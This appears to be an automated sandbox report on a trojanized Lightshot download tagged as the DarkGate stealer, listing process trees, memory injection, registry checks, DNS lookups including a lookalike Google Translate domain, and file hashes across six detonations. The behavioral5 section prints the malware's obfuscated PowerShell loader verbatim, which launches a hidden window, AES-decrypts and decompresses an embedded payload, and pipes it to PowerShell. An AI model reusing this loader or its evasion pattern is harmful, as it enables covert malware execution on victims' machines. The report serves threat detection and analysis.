Malware Analysis Report

2024-11-13 14:54

Sample ID 231201-wwwlaseg51
Target lightshot.zip
SHA256 109aac8fd1994e580398ee91fce9a9e1ef39873566e601106ce2ad6be29e06a6
Tags darkgate a11111 stealer
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral5
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral6
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10
SHA256 109aac8fd1994e580398ee91fce9a9e1ef39873566e601106ce2ad6be29e06a6

Threat Level: Known bad

The file lightshot.zip was found to be: Known bad.

Malicious Activity Summary

darkgate a11111 stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

DarkGate

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Enumerates physical storage devices

Unsigned PE

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2023-12-01 18:16

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win7-20231023-en
Max time kernel 120s
Max time network 18s

Command Line

"C:\Windows\system32\Dwm.exe"

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe
PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe
PID 1448 created 1156 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe
PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe
PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Processes

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | trans1ategooglecom.com | udp

Files

memory/2872-0-0x00000000008E0000-0x0000000000BA2000-memory.dmp

\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/2872-7-0x00000000008E0000-0x0000000000BA2000-memory.dmp

memory/1448-11-0x0000000000A30000-0x0000000000E30000-memory.dmp

memory/1448-12-0x0000000002DF0000-0x0000000002F85000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1448-18-0x0000000002DF0000-0x0000000002F85000-memory.dmp

memory/1448-19-0x0000000002DF0000-0x0000000002F85000-memory.dmp

memory/1448-20-0x0000000002DF0000-0x0000000002F85000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win10v2004-20231127-en
Max time kernel 92s
Max time network 123s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

DarkGate

stealer darkgate

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe
PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe
PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe
PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe
PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 152.78.101.95.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 192.240.110.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp

Files

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/552-4-0x0000000000400000-0x00000000006C2000-memory.dmp

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/2464-7-0x0000000001510000-0x0000000001910000-memory.dmp

memory/2464-9-0x0000000004660000-0x00000000047F5000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/2464-15-0x0000000004660000-0x00000000047F5000-memory.dmp

memory/2464-16-0x0000000004660000-0x00000000047F5000-memory.dmp

memory/2464-18-0x0000000004660000-0x00000000047F5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win7-20231023-en
Max time kernel 118s
Max time network 132s

Command Line

"C:\Windows\system32\Dwm.exe"

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe
PID 1120 created 1380 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe
PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe
PID 1120 created 1380 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe
PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe
PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Users\Admin\AppData\Local\Temp\Lightshot.exe

"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

N/A

Files

memory/1940-0-0x0000000002480000-0x0000000002742000-memory.dmp

\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1940-7-0x0000000002480000-0x0000000002742000-memory.dmp

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/1120-11-0x0000000000730000-0x0000000000B30000-memory.dmp

memory/1120-12-0x0000000002F00000-0x0000000003095000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1120-18-0x0000000002F00000-0x0000000003095000-memory.dmp

memory/1120-19-0x0000000002F00000-0x0000000003095000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win10v2004-20231127-en
Max time kernel 87s
Max time network 119s

Command Line

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

Signatures

DarkGate

stealer darkgate

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe
PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe
PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe

Processes

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\Lightshot.exe

"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"

\??\c:\tmpp\Autoit3.exe

c:\tmpp\Autoit3.exe c:\tmpp\test.au3

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 152.78.101.95.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp

Files

memory/3812-0-0x0000000003360000-0x0000000003622000-memory.dmp

C:\tmpp\Autoit3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/3812-5-0x0000000003360000-0x0000000003622000-memory.dmp

\??\c:\tmpp\test.au3

MD5 dbd1ca08a1b009d1abab3def6ffa967b
SHA1 f05c604a879c9396f93f6857f84d6ba58734ae0f
SHA256 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1
SHA512 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb

memory/1660-9-0x00000000016D0000-0x0000000001AD0000-memory.dmp

memory/1660-10-0x0000000004920000-0x0000000004AB5000-memory.dmp

\??\c:\tmpp\AutoIt3.exe

MD5 cb7ec6c3e69865e46e49a684146e6564
SHA1 a0e464b16936f21bbd9100b9f46a52a10cd2d3e7
SHA256 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343
SHA512 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0

memory/1660-17-0x0000000004920000-0x0000000004AB5000-memory.dmp

memory/1660-16-0x0000000004920000-0x0000000004AB5000-memory.dmp

memory/1660-19-0x0000000004920000-0x0000000004AB5000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win7-20231020-en
Max time kernel 118s
Max time network 121s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1364 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 2416 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2724 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2752 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2752 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2272 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = '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';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = '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';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $bjKJNucK = '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';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

Network

N/A

Files

